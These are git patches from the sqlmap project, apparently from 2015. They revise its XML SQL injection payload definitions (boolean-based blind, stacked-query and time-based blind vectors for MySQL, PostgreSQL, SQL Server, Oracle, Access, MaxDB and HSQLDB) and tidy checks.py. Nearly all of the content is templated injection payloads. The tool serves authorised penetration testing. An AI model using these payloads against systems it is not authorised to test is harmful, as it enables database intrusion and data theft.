+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR ([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
     <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
 
     <!-- Boolean-based blind tests - Parameter replace -->
@@ -290,7 +403,7 @@ Tag: <test>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
         </request>
         <response>
             <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
@@ -428,12 +541,32 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
@@ -447,6 +580,25 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
@@ -475,7 +627,7 @@ Tag: <test>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
         </request>
         <response>
             <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
@@ -524,6 +676,7 @@ Tag: <test>
         </details>
     </test>
 
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
     <test>
         <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
         <stype>1</stype>
@@ -544,12 +697,33 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
@@ -565,12 +739,31 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
+        <title>Oracle boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
@@ -584,12 +777,31 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
+        <title>Microsoft Access boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
+        <vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>
+        <request>
+            <payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>
+        </request>
+        <response>
+            <comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
         <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
         <request>
             <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
@@ -603,12 +815,31 @@ Tag: <test>
     </test>
 
     <test>
-        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
+        <title>SAP MaxDB boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
         <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
         <request>
             <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
@@ -658,7 +889,7 @@ Tag: <test>
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -698,7 +929,7 @@ Tag: <test>
     <test>
         <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -778,19 +1009,19 @@ Tag: <test>
     -->
     <test>
         <!-- <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses (GENERATE_SERIES - original value)</title> -->
-        <title>PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value)</title>
+        <title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
         <!-- <clause>2,3</clause> -->
         <clause>3</clause>
         <where>1</where>
-        <vector>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
         <request>
-            <payload>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+            <payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
         </request>
         <response>
-            <comparison>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+            <comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -962,13 +1193,13 @@ Tag: <test>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>;(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
         <request>
-            <payload>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -983,13 +1214,13 @@ Tag: <test>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -999,7 +1230,7 @@ Tag: <test>
     <test>
         <title>PostgreSQL boolean-based blind - Stacked queries</title>
         <stype>1</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -1016,10 +1247,31 @@ Tag: <test>
         </details>
     </test>
 
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
     <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
+        <title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
         <stype>1</stype>
-        <level>2</level>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
+        <request>
+            <payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
+        <stype>1</stype>
+        <level>3</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -1037,5 +1289,87 @@ Tag: <test>
             <os>Windows</os>
         </details>
     </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;IIF([INFERENCE],1,1/0)</vector>
+        <request>
+            <payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
+        <request>
+            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
     <!-- End of boolean-based blind tests - Stacked queries -->
 </root>

From 79d4d970a5658d9a36919ed0ed23f5cfa72c676d Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 15:42:28 +0000
Subject: [PATCH 349/492] trivial code cleanup

---
 lib/controller/checks.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 65f264077..2683accf6 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -350,6 +350,7 @@ def checkSqlInjection(place, parameter, value):
                         # will likely result in a different content
                         kb.data.setdefault("randomInt", str(randomInt(10)))
                         kb.data.setdefault("randomStr", str(randomStr(10)))
+
                         if conf.invalidLogical:
                             _ = int(kb.data.randomInt[:2])
                             origValue = "%s AND %s=%s" % (value, _, _ + 1)
@@ -359,6 +360,7 @@ def checkSqlInjection(place, parameter, value):
                             origValue = kb.data.randomStr[:6]
                         else:
                             origValue = "-%s" % kb.data.randomInt[:4]
+
                         templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
                     elif where == PAYLOAD.WHERE.REPLACE:
                         origValue = ""

From 3b3205c53253e8b217acad9b6178fc852b6ba49a Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 15:44:06 +0000
Subject: [PATCH 350/492] Minor stacked queries and time-based payloads cleanup
 - issue #1169

---
 xml/payloads/04_stacked_queries.xml | 22 ++++++++---------
 xml/payloads/05_time_blind.xml      | 37 +++++++++++++++--------------
 2 files changed, 30 insertions(+), 29 deletions(-)

diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
index 77641a9a9..3c5a41869 100644
--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -6,7 +6,7 @@
         <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
         <stype>4</stype>
         <level>2</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -26,7 +26,7 @@
         <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
         <stype>4</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -47,7 +47,7 @@
         <title>MySQL &gt; 5.0.11 stacked queries</title>
         <stype>4</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
@@ -88,7 +88,7 @@
         <title>PostgreSQL &gt; 8.1 stacked queries</title>
         <stype>4</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -129,7 +129,7 @@
         <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
         <stype>4</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -151,7 +151,7 @@
         <title>Microsoft SQL Server/Sybase stacked queries</title>
         <stype>4</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -173,7 +173,7 @@
         <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
         <stype>4</stype>
         <level>5</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
@@ -213,7 +213,7 @@
         <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
         <stype>4</stype>
         <level>5</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
@@ -233,7 +233,7 @@
         <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
         <stype>4</stype>
         <level>5</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
@@ -295,7 +295,7 @@
         <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
         <stype>4</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@@ -316,7 +316,7 @@
         <title>HSQLDB &gt;= 2.0 stacked queries</title>
         <stype>4</stype>
         <level>4</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 1d3ba16df..e8d90e26d 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -207,7 +207,7 @@
         <title>Microsoft SQL Server/Sybase time-based blind</title>
         <stype>5</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
         <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -931,12 +931,13 @@
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of OR time-based blind tests -->
 
-    <!-- Time-based tests - After ORDER BY...LIMIT... -->
+    <!-- Time-based tests - LIMIT clause -->
+    <!-- This payload does not work with SLEEP() -->
     <test>
-        <title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
         <stype>5</stype>
         <level>3</level>
-        <risk>1</risk>
+        <risk>2</risk>
         <clause>1,2,3,4,5</clause>
         <where>1</where>
         <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
@@ -951,7 +952,7 @@
             <dbms_version>&gt; 5.0.11</dbms_version>
         </details>
     </test>
-    <!-- Time-based tests - After ORDER BY...LIMIT... -->
+    <!-- Time-based tests - LIMIT clause -->
 
     <!-- Time-based blind tests - Parameter replace -->
     <test>
@@ -1177,7 +1178,7 @@
         <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
         <stype>5</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1,3</clause>
         <where>3</where>
         <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
@@ -1351,9 +1352,9 @@
     <!-- End of time-based blind tests - Parameter replace -->
 
 
-    <!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
+    <!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
     <test>
-        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1373,7 +1374,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
         <stype>5</stype>
